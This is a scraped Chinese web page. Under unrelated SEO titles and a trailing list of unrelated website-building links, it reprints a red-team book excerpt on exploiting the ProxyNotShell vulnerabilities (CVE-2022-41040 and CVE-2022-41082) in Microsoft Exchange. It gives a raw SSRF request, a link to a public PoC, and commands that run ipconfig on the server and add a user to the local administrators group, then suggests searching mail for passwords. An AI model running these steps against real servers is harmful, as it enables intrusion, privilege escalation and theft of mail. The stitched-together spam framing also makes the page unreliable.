当前位置: 首页 > news >正文

微商城网站建设报价做不锈钢的网站有哪些

微商城网站建设报价,做不锈钢的网站有哪些,想要网站推广页面,网站推广营销活动点击星标,即时接收最新推文 本文选自《内网安全攻防:红队之路》 在渗透测试过程,如果目标环境存在Exchange服务器,我们也需要测试是否存在已知的远程命令执行漏洞,这里首先介绍ProxyNotShell。 ProxyNotShell和之前…

点击星标,即时接收最新推文

360729f308373efce6f97ca8a77f2739.png

本文选自《内网安全攻防:红队之路》

在渗透测试过程,如果目标环境存在Exchange服务器,我们也需要测试是否存在已知的远程命令执行漏洞,这里首先介绍ProxyNotShell。   

ProxyNotShell和之前的ProxyShell一样,也是将几个漏洞组合起来使用,分别为CVE-2022-41040和CVE-2022-41082。

ProxyNotShell利用链的第一个漏洞为CVE-2022-41040,该漏洞为Exchange Autodiscover前端中的一个无需认证的SSRF漏洞,攻击者可利用该漏洞以LocalSystem权限向后端的任意URL发送数据。下面为POC:

GET /autodiscover/autodiscover.json?@zdi/PowerShell?serializationLevel=Full;ExchClientVer=15.2.922.7;clientApplication=ManagementShell;TargetServer=;PSVersion=5.1.17763.592&Email=autodiscover/autodiscover.json%3F@zdi HTTP/1.1
Host: 192.168.3.12
Authorization: Basic ZGF2ZTpQYXNzdzByZEAwMg==
Connection: close

ProxyNotShell利用链的第二个漏洞为CVE-2022-41082,是存在于Exchange PowerShell后端的远程代码执行漏洞。在利用CVE-2022-41040绕过认证后,攻击者可利用CVE-2022-41082执行任意命令。

我们可以使用nmap脚本扫描目标服务器是否存在漏洞,如下图所示,脚本地址为https://github.com/CronUp/Vulnerabilidades/blob/main/proxynotshell_checker.nse:

38ddd9d7272701d81bcb389c236de5a8.png

扫描ProxyNotShell

下图输出表明目标服务器可能存在ProxyNotShell漏洞。接下来,我们进行具体的利用,PoC地址为https://github.com/testanull/ProxyNotShell-PoC(因为部分代码是从其他项目直接复制的,使用的是python2的print语法,如果使用python3运行脚本,需要修改print)。利用的前提是需要一个有效的账户和密码。

pip install requests_ntlm2 requests
python3 proxynotshell.py https://192.168.3.12 dave Passw0rd@02 'ipconfig > c:\inetpub\wwwroot\aspnet_client\ipconfig.txt'
curl -k https://192.168.3.12/aspnet_client/ipconfig.txt

cc5bcbd17d15c4d0d4ba37bba64e1227.png

ProxyNotShell利用

从下图可以看到我们成功在目标服务执行命令。我们也可以将我们控制的用户添加到目标服务器的本地管理员组:

python3 proxynotshell.py https://192.168.3.12 dave Passw0rd@02 'net localgroup administrators dev\dave /add'

f5f41412298c4c6a4be04bfa8eaea1f2.png

ProxyNotShell添加管理员

在获得邮件服务器权限后,我们可以搜索所有邮件,来查找是否存在账户密码信息,或者其他高价值数据,也可以利用Exchange默认的一些组成员关系进行权限提升。

—  实验室旗下直播培训课程  —

81aa06591037adc0ac5859d51c3d23ec.png

2fe8440317d99f4f36ffe8535d1fa8df.jpeg

a56512df6db5defb5f977b1b7c9217d5.jpegc76fabfae30de51473db2cf2292c5b01.png

cea28a8276d964c8ff59eff21a2fc6c9.png

5735b6af594aa394db945fd302882bf5.jpeg

4dae689e6b82bf29ff9a894985cbee6f.jpeg

f8f1cddf3583156348d7b517c7b084ce.jpeg

82bb1b32950efadb49254fbea6d27bbb.png

和20000+位同学加入MS08067一起学习

e0fa9fc1f56507a978fd0fb0d2c13bf9.gif

http://www.yayakq.cn/news/72666/

相关文章:

  • 做配资网站多少钱网站建设问一问公司
  • 电影网站制作网站加入视频
  • 网站建设中的时尚资讯sem是什么牌子
  • 温州网站建设平台建筑人才网招聘信息
  • 网上商城网站开发公司解释seo网站推广
  • 在哪个网做免费网站好做网站不推广
  • 网页建站网站申请grace8WordPress主题
  • 网站里自己怎么做推广中国轻工建设公司网站
  • 上海建设网站服务东莞企业网站建设报价
  • 福建祥盛建设有限公司网站微信小程序开通要钱吗
  • 请问下网站开发怎么弄艺术培训学校系统网站怎么做
  • 汉服网站开发背景请假条模板
  • 龙华网站(建设龙华信科)域名主机 网站建设
  • 灌南县建设局网站高端的食品行业网站开发
  • 湖南网站建设 莫道海宁市住房与建设规划局网站
  • 茶文化建设网站的意义阿里云域名注册官网入口
  • 网站技术建设维护技术论文常见的网页布局有哪些
  • 有什么网站可以做婚庆视频如何推广新产品的方法
  • 网站如何做百度推广门窗专业设计网站
  • 如何评估网站网站建设推广
  • 做电影网站收入网络营销有哪些岗位
  • 做自适应网站加强网站信息建设
  • 网站必须兼容哪些浏览器什么网站可以做产品入驻
  • asp.net 音乐网站开发乐陵seo快速排名
  • 单位网站建设工作总结百度指数总结
  • 做app页面的网站海珠定制型网站建设
  • 上海哪家公司提供专业的网站建设网络培训心得体会教师
  • 网站实现步骤及方法网店设计英文
  • 班级网页设计模板图片阳西网站seo
  • 建设部网站水利设计资质忻州网络公司网站建设